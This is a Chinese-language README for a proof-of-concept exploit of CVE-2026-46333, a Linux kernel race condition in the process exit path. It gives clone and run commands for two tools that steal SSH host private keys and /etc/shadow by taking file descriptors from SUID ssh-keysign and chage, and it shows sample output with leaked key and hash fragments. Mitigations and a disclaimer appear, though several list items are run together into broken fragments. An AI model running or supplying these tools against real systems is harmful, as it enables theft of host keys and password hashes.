
CVE-2026-46333
高性能概念验证 针对 Linux 内核竞态条件漏洞
一个干净可靠的概念验证漏洞利用程序,针对 CVE-2026-46333 — 通过 Linux 内核进程退出路径中的竞态条件实现本地信息泄露。
在 Kali Linux 上成功窃取 SSH 主机私钥和 /etc/shadow
CVE-2026-46333(又名 ssh-keysign-pwn)是 Linux 内核 ptrace 与进程退出逻辑(do_exit() → exit_mm() 在 exit_files() 之前)中的一种竞态条件。
当特权进程(例如 SUID ssh-keysign 或 chage)在退出期间 mm == NULL 时,可转储性检查被绕过,从而允许非特权本地攻击者使用 pidfd_getfd() 窃取打开的文件描述符。
影响:
/etc/ssh/ssh_host_*_key)/etc/shadow发现者:Qualys
修复:内核提交 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a(2026年5月)
chage 窃取 /etc/shadowgit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| 文件 | 描述 |
|---|---|
cve-2026-46333.c | SSH 主机私钥窃取器 |
cve-2026-46333-shadow.c | 通过 chage 窃取 /etc/shadow |
README.md | 本文件 |
SSH 密钥窃取器:
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
Shadow 窃取器:
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd... 的任何版本sshd_config 中禁用 EnableSSHKeysign本利用程序仅用于教育及安全研究目的。
请仅在你拥有所有权或已获得明确书面授权的系统上使用。
作者对任何滥用或损坏概不负责。
本项目采用 MIT 许可证 — 欢迎自由使用、修改和分发。
以 ❤️ 为安全社区制作
保持系统更新是最佳的防御措施。